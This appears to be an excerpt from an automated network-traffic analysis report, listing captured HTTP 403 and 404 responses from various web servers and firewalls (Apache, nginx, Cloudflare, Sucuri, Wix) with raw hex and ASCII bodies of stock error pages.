                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: a7c175fb-d336-4217-9aef-7060af12a6e6CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mQiwnvF0fkCKsOcwu%2BcwhMkwxL7Oampmitpu4DJocHb8Ao4insuG4rHHxCbcvVzqsSrZCa0aT0X0xhfULEOGMytuL%2FBR18VhQDjM51iStNSx38H0%2F8%2BW7P0ENl7GCsI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=145.999908Server: cloudflareCF-RAY: 7abbc80b2f466955-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:47 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:47 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:48 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 22 Mar 2023 04:44:48 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 22 Mar 2023 04:44:48 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:48 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=auddGvLdP6326F6bG1e%2F8OHE9c%2FZVLwRSt4vc9ki28xznb9uW4VvTFuSLVh6mpvyljnbPTZU24h%2B%2BYox7NV7yS6inLfh8Vb0rnTVJbiv3Z6IsNUP4tbC%2FB1erUTc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc818bfb52c61-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 63 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 Data Ascii: 1c11<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equ
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:44:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7IPZuv2EfYKqp51D6QAKhbhWmiWQpOjHmKHBsbPzNpQ6gchthM3W52Tc8y6aH3FnFxf7%2BcCNS6rVk%2BxVRLEAIt7IUfF4mPkw9PKt2S1rqTJiL%2BE1pZZ7KV0qGHBL1GE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc81a8e5a9b8e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:50 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NZL9Lwun+M+7c/tw2Pto8/HfDZMuy7wHvsEdc9UjMBkF,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1679460290.320213823803816781X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 